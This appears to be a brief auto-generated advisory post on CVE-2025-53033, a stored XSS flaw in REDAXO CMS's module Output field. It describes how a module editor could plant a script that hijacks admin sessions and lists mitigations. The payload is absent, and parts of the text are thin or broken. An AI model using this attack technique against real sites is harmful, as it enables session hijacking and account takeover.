Listen to this Post
The CVE-2025-53033 vulnerability in REDAXO CMS functions by exploiting the “Output” code field within its module management system. This field is intended for developers to input the HTML/PHP code that a module will display on the frontend. However, the application fails to properly sanitize user-controllable input before it is permanently stored. A remote, authenticated user with module editing permissions can inject a malicious JavaScript payload directly into this Output field. The vulnerability is “stored” because the payload is saved within the module’s configuration in the database. The attack triggers when any other user, such as an editor or administrator, accesses a page in the backend that uses a “slice” based on the compromised module. Upon viewing or editing that , the malicious script is rendered and executed in the victim’s browser within the security context of the REDAXO CMS backend session.
Platform: REDAXO CMS
Version: 5.20.0
Vulnerability : Stored XSS
Severity: Moderate
date: 2025-11-25
Prediction: Patch 2025-12-02
What Undercode Say:
`curl -s https://www.redaxo.org/api/security/ | jq ‘.’`
`grep -r “output.field” redaxo/modules/`
`echo “Alert: Check module code for unsanitized echo statements”`
How Exploit:
Attacker injects `` into the module’s Output code field. The payload is stored and executed when an admin views any page that uses a slice from the tampered module, potentially hijacking the admin session.
Protection from this CVE
Update REDAXO CMS.
Sanitize module output.
Implement Content Security Policy.
Escape user input.
Apply principle of least privilege.
Impact:
Backend session hijacking.
Unauthorized admin actions.
Data theft from backend.
Account compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
